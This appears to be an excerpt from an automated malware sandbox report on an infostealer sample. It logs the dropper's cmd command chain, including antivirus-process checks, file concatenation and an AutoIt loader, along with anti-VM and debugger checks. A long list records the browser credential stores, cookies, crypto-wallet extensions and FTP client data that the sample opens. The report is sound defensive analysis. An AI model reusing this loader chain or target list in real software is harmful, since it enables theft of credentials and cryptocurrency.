    Source: Amcache.hve.24.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.24.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.24.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.24.dr | Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.24.dr | Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.24.dr | Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.24.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.24.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process information queried: ProcessInformation
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process queried: DebugPort
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process queried: DebugPort
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00405B93 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405B93
    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
    Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 826825
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Mods.vob
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Previously" Mean
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\826825\Motion.com Motion.com g
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: Motion.com, 00000011.00000000.1311651386.0000000000263000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.1.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00405C44 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,0_2_00405C44
    Source: Amcache.hve.24.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.24.dr | Binary or memory string: msmpeng.exe
    Source: Amcache.hve.24.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.24.dr | Binary or memory string: MsMpEng.exe
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
